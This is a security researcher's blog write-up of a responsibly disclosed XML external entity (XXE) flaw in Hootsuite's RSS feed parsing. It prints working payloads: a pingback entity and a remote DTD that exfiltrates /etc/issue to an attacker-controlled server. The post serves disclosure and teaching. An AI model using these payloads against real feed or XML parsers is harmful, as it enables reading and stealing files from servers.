Yasin Soliman

Yasin Soliman


I'm Yasin, a security analyst and OSCP from the UK, interested in web application testing and red team operations. This is my personal blog for sharing research findings.

Yasin Soliman
Author

Share


Twitter


From RSS to XXE: feed parsing on Hootsuite

Yasin SolimanYasin Soliman

Mike Knoop's research into XXE exploitation inspired me to experiment with RSS parsing on Hootsuite.

These vulnerabilities arise when a parser validates and processes XML-based input which contains references to an external entity.

Within fifteen minutes of testing, I had gained a pingback and demonstrated an exfiltration of /etc/issue.

Hootsuite logo

Hootsuite is the world's most widely used platform for managing social media. More than 15 million users, including 800+ of the Fortune 1000 companies, trust Hootsuite to manage their social media programs across multiple social networks from one integrated dashboard.

Getting a pingback in production

Using Mike's XML file as a model, I configured an "xxe" SYSTEM entity to deliver a pingback – a simple GET request towards the "attacker" Apache server.

<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE title [ <!ELEMENT title ANY >  
<!ENTITY xxe SYSTEM "http://<AttackIP>/rssXXE" >]>  
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">  
<channel>  
    <title>XXE Test Blog</title>
    <link>http://example.com/</link>
    <description>XXE Test Blog</description>
    <lastBuildDate>Mon, 02 Feb 2015 00:00:00 -0000</lastBuildDate>
    <item>
        <title>&xxe;</title>
        <link>http://example.com</link>
        <description>Test Post</description>
        <author>author@example.com</author>
        <pubDate>Mon, 02 Feb 2015 00:00:00 -0000</pubDate>
    </item>
</channel>  
</rss>  

After checking the Apache access log was ready (with a tail -f stream), I clicked "Save Feed" and waited in anticipation.

One second later, access.log lit up with a pingback – the Hootsuite server was vulnerable to SYSTEM entity exploitation.

Testing with /etc/issue

Transferring notes across my slew of TextEdit screens, I decided to craft a bipartite XML structure to demonstrate exploitability: grab the /etc/issue version file and exfiltrate via my Apache attack server.

<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE roottag [  
<!ENTITY % file SYSTEM "file:///etc/issue">  
<!ENTITY % dtd SYSTEM "http://<WebServer>/xxe.dtd">  
%dtd;]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">  
<channel>  
    <title>&file; &dtd;</title>
    <link>http://example.com/</link>
    <description>&send;</description>
    <lastBuildDate>Mon, 02 Feb 2015 00:00:00 -0000</lastBuildDate>
    <item>
        <title>&file; &dtd;</title>
        <link>http://example.com</link>
        <description>&send;</description>
        <author>author@example.com</author>
        <pubDate>Mon, 02 Feb 2015 00:00:00 -0000</pubDate>
    </item>
</channel>  
</rss>  

As you can see, line 4 references a Document Type Definition file ("xxe.dtd") – used to deliver the contents of /etc/issue in a pingback:

<?xml version="1.0" encoding="UTF-8"?>  
<!ENTITY % all "<!ENTITY send SYSTEM 'http://<AttackIP>/XXE?%file;'>">  
%all;

Upon submitting the new XML file to the Dashboard as an RSS feed, Apache lit up with a second pingback: the contents of /etc/issue, exfiltrated straight across to the server.

XXE pingback on Hootsuite in production

Files with extended content or incompatible characters (e.g. & and \n) would cause the exfiltration to malfunction; the /etc/issue file is a safe test case used to identify XML External Entity concerns.

At this point, I decided to wrap things up and prepare a summary. Notes collated, I sent an email to security@hootsuite.com.

Conclusion

This vulnerability was responsibly disclosed to Hootsuite; recognition has been provided on the Security page.

I would like to commend Pablo from Security Operations for handling this report with expedition and professionalism – and the Hootsuite development team for a swift remediation.

Further reading

Research timeline

The following timestamps are provided in GMT.

Public disclosure was requested several weeks after confirmation of the fix:

Yasin Soliman
Author

Yasin Soliman

Comments